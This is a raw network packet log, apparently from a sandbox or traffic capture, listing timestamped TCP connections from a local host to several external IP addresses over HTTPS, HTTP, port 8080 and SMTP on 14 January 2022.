Jan 14, 2022 00:15:25.598572969 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.598675966 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.599200964 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.599298954 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.599302053 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.599319935 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.599380016 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.599415064 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.599488974 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.599509954 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.599520922 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.599551916 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.599572897 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.599646091 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.599657059 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.599761963 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.600079060 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.600162029 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.600163937 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.600179911 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.600231886 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.600245953 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.600259066 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.600270033 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.600310087 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.600313902 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.600380898 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.600388050 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.600404024 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.600455046 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.600461960 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.600526094 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.600528955 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.600541115 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.600600958 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.600600958 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.600617886 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.600666046 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.600682974 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.600697994 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.600708961 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.600764990 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.600780964 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.600853920 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.600858927 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.600876093 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.600919008 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.600943089 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.600996971 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.600996971 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.601015091 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.601069927 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.601119041 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.601150036 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.601201057 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.601213932 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.601229906 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.601255894 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.601303101 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.601340055 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.601341009 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.601362944 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.601382971 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.601397991 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.601463079 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.601475954 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.601519108 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.601571083 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.604310036 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.620835066 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.620858908 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.621000051 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.621035099 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.621057034 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.621249914 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.629832029 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.629862070 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.638426065 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.638469934 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.638540983 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.638582945 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.638606071 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.639199018 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.639230013 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.639271975 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.639285088 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.639303923 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.639384031 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.639400959 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.639417887 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.639439106 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.639477968 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.639498949 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.639513016 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.639527082 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.639553070 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.639592886 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.639605045 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.639620066 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.639650106 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.639663935 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.639678001 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.639697075 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.639719009 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.639759064 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.639770031 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.639790058 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.639815092 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.639858961 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.639873028 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.639888048 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.639904022 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.639934063 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.639974117 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.639986992 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.640007019 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.640017033 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.640043020 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.640048981 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.640063047 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.640079975 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.640122890 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.640134096 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.640149117 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.640171051 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.640204906 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.640219927 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.640235901 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.640244007 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.640271902 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.640312910 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.640326023 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.640341043 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.640386105 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.640496016 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.640527010 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.640568018 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.640582085 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.640597105 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.640644073 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.640683889 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.641133070 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.641161919 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.641212940 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.641226053 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.641247034 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.641283035 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.641674995 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.641702890 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.641751051 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.641765118 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.641788006 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.641823053 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.642304897 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.642333984 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.642381907 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.642394066 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.642420053 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.642455101 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.642746925 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.642781973 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.642822027 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.642834902 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.642849922 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.642860889 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.642916918 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.643975973 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.644000053 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:25.644031048 CET	49811	443	192.168.2.4	162.159.130.233
Jan 14, 2022 00:15:25.644045115 CET	443	49811	162.159.130.233	192.168.2.4
Jan 14, 2022 00:15:27.161155939 CET	49812	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:27.214622021 CET	80	49812	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:27.215373993 CET	49812	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:27.215506077 CET	49812	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:27.216059923 CET	49812	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:27.267407894 CET	80	49812	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:27.269556046 CET	80	49812	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:27.297517061 CET	80	49812	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:27.297590971 CET	49812	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:27.297771931 CET	49812	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:27.334661961 CET	49813	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:27.350425959 CET	80	49812	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:27.386754990 CET	80	49813	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:27.386884928 CET	49813	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:27.386990070 CET	49813	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:27.387064934 CET	49813	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:27.438458920 CET	80	49813	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:27.468163967 CET	80	49813	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:27.468235970 CET	80	49813	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:27.468338966 CET	49813	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:27.468538046 CET	49813	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:27.496081114 CET	49814	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:27.518759012 CET	80	49813	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:27.546895027 CET	80	49814	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:27.547069073 CET	49814	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:27.547250986 CET	49814	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:27.547276974 CET	49814	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:27.598443985 CET	80	49814	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:27.634601116 CET	80	49814	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:27.634743929 CET	49814	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:27.634887934 CET	49814	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:27.642487049 CET	49815	80	192.168.2.4	188.166.28.199
Jan 14, 2022 00:15:27.686152935 CET	80	49814	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:28.384685040 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:28.384901047 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:28.384952068 CET	49807	8080	192.168.2.4	185.7.214.171
Jan 14, 2022 00:15:28.447004080 CET	8080	49807	185.7.214.171	192.168.2.4
Jan 14, 2022 00:15:30.630511999 CET	49815	80	192.168.2.4	188.166.28.199
Jan 14, 2022 00:15:36.646706104 CET	49815	80	192.168.2.4	188.166.28.199
Jan 14, 2022 00:15:39.957448006 CET	49829	25	192.168.2.4	40.93.212.0
Jan 14, 2022 00:15:40.090080976 CET	25	49829	40.93.212.0	192.168.2.4
Jan 14, 2022 00:15:40.090253115 CET	49829	25	192.168.2.4	40.93.212.0
Jan 14, 2022 00:15:40.090714931 CET	49829	25	192.168.2.4	40.93.212.0
Jan 14, 2022 00:15:40.222659111 CET	25	49829	40.93.212.0	192.168.2.4
Jan 14, 2022 00:15:40.224019051 CET	25	49829	40.93.212.0	192.168.2.4
Jan 14, 2022 00:15:40.224062920 CET	25	49829	40.93.212.0	192.168.2.4
Jan 14, 2022 00:15:40.224158049 CET	49829	25	192.168.2.4	40.93.212.0
Jan 14, 2022 00:15:40.224195957 CET	49829	25	192.168.2.4	40.93.212.0
Jan 14, 2022 00:15:42.898693085 CET	49844	443	192.168.2.4	8.209.67.104
Jan 14, 2022 00:15:42.898761988 CET	443	49844	8.209.67.104	192.168.2.4
Jan 14, 2022 00:15:42.898860931 CET	49844	443	192.168.2.4	8.209.67.104
Jan 14, 2022 00:15:48.704440117 CET	49860	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:48.757441998 CET	80	49860	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:48.757615089 CET	49860	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:48.757719994 CET	49860	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:48.757754087 CET	49860	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:48.811024904 CET	80	49860	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:48.837771893 CET	80	49860	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:48.841203928 CET	49860	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:48.841249943 CET	49860	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:48.873575926 CET	49861	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:48.893959045 CET	80	49860	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:48.926656961 CET	80	49861	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:48.926767111 CET	49861	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:48.926897049 CET	49861	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:48.926913977 CET	49861	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:48.980031967 CET	80	49861	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.010322094 CET	80	49861	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.012327909 CET	49861	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.048938036 CET	49861	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.106141090 CET	80	49861	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.115875959 CET	49862	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.166843891 CET	80	49862	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.170021057 CET	49862	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.170149088 CET	49862	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.170167923 CET	49862	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.220995903 CET	80	49862	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.252274990 CET	80	49862	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.252522945 CET	49862	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.252568007 CET	49862	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.281055927 CET	49863	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.303901911 CET	80	49862	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.333249092 CET	80	49863	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.333399057 CET	49863	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.333483934 CET	49863	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.333493948 CET	49863	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.385682106 CET	80	49863	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.415872097 CET	80	49863	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.415947914 CET	49863	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.416001081 CET	49863	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.444478989 CET	49864	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.468519926 CET	80	49863	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.494893074 CET	80	49864	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.494987965 CET	49864	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.495960951 CET	49864	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.495978117 CET	49864	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.547506094 CET	80	49864	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.579231024 CET	80	49864	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.579313993 CET	49864	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.579492092 CET	49864	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.610770941 CET	49865	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.631680965 CET	80	49864	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.663372993 CET	80	49865	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.664216995 CET	49865	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.664318085 CET	49865	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.664331913 CET	49865	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.716332912 CET	80	49865	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.743911028 CET	80	49865	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.744054079 CET	49865	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.744286060 CET	49865	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.793371916 CET	49866	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.797393084 CET	80	49865	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.845068932 CET	80	49866	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.845175028 CET	49866	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.845319033 CET	49866	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.845335007 CET	49866	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.896959066 CET	80	49866	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.929292917 CET	80	49866	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:49.930497885 CET	49866	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:49.966181993 CET	49866	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.018405914 CET	80	49866	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.082228899 CET	49867	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.134874105 CET	80	49867	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.135025024 CET	49867	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.135118008 CET	49867	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.135180950 CET	49867	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.186850071 CET	80	49867	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.218735933 CET	80	49867	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.220055103 CET	49867	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.220215082 CET	49867	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.252743006 CET	49868	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.272116899 CET	80	49867	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.305978060 CET	80	49868	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.306094885 CET	49868	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.306191921 CET	49868	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.306212902 CET	49868	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.358007908 CET	80	49868	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.386307955 CET	80	49868	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.386394978 CET	49868	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.386560917 CET	49868	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.414655924 CET	49869	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.438785076 CET	80	49868	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.468367100 CET	80	49869	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.468590975 CET	49869	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.468638897 CET	49869	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.468647957 CET	49869	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.522299051 CET	80	49869	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.550911903 CET	80	49869	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.551028967 CET	49869	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.551100016 CET	49869	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.583080053 CET	49870	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.604461908 CET	80	49869	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.635732889 CET	80	49870	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.636018038 CET	49870	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.636183977 CET	49870	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.636204958 CET	49870	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.689573050 CET	80	49870	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.716648102 CET	80	49870	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.720846891 CET	49870	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.738306046 CET	49870	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.771389961 CET	49871	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.789546013 CET	80	49870	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.823216915 CET	80	49871	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.823384047 CET	49871	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.823484898 CET	49871	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.823565960 CET	49871	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:15:50.875186920 CET	80	49871	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.875209093 CET	80	49871	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.905293941 CET	80	49871	93.189.42.167	192.168.2.4
Jan 14, 2022 00:15:50.905443907 CET	49871	80	192.168.2.4	93.189.42.167
